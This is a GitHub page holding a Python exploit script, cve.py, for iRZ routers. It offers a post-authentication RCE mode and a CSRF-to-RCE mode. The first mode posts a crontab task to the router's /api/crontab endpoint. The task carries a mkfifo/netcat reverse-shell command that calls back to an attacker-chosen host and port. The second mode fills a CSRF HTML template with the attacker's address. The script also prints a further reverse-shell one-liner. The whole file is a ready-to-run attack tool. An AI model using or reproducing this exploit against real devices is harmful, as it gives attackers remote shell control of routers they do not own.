-
Notifications
You must be signed in to change notification settings - Fork 6
/
cve.py
147 lines (103 loc) · 4.92 KB
/
cve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
import os
import requests
import json
import subprocess
option = "0"
def main():
print("####################################################")
print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
print("####################################################")
print()
print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
print()
print("1. Post Authentication RCE (Needs Credentials)")
print("2. CSRF to RCE (No Credentials)")
print()
runit()
def runit():
option = input("Select an option: ")
if option == "1":
exploit1()
elif option == "2":
exploit2()
else:
print("You must select '1' or '2'. Exiting.")
def exploit1():
print("## Running Post Auth RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")
router_user = input("## Enter the username for the router login: ")
router_pass = input("## Enter the password for the router login: ")
LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")
router_url = f'http://{router_ip}:{router_port}'
nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
input(nc1_str + "\n\nPress enter once you do")
send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)
def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
intro = f'Sending the payload to {router_url}\n'
print(intro)
payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
f'{lhost_ip} {lhost_port} ' + \
'>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'
payload_json = json.loads(payload_str)
s = requests.Session()
s.auth = (router_user, router_pass)
s.headers.update(
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
s.headers.update({"X-Requested-With": "XMLHttpRequest"})
s.headers.update({"Origin": router_url})
s.headers.update({"Referer": router_url})
s.post(router_url + "/api/crontab", json=payload_json)
exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'
print(
"Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
print("To fix TTY: type telnet 0.0.0.0 in the shell")
def exploit2():
print("## Running CSRF to RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")
LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")
load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)
def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"
if os.path.isfile(file_path):
with open(file_path) as poc_file:
original_poc_data_str = poc_file.read()
new_html = original_poc_data_str.replace("{router_ip}", router_ip)
new_html = new_html.replace(
"{router_port}", str(router_port))
lhost_split_arr = lhost_ip.split(".")
if len(lhost_split_arr) == 4:
new_html = new_html.replace(
"{lhost_ip_octect_1}", lhost_split_arr[0])
new_html = new_html.replace(
"{lhost_ip_octect_2}", lhost_split_arr[1])
new_html = new_html.replace(
"{lhost_ip_octect_3}", lhost_split_arr[2])
new_html = new_html.replace(
"{lhost_ip_octect_4}", lhost_split_arr[3])
new_html = new_html.replace(
"{lhost_port}", lhost_port)
new_file_path = os.path.dirname(
__file__) + os.sep + "poc.new.html"
try:
with open(new_file_path, 'w') as new_file:
new_file.write(new_html)
print()
print(
f'New file written to {new_file_path}. Host this file')
except FileNotFoundError:
print("You had an error writing to the file, doesn't exist.")
else:
print(f'{lhost_ip} is not a proper IPV4 address.')
else:
print(f'{file_path} not found')
main()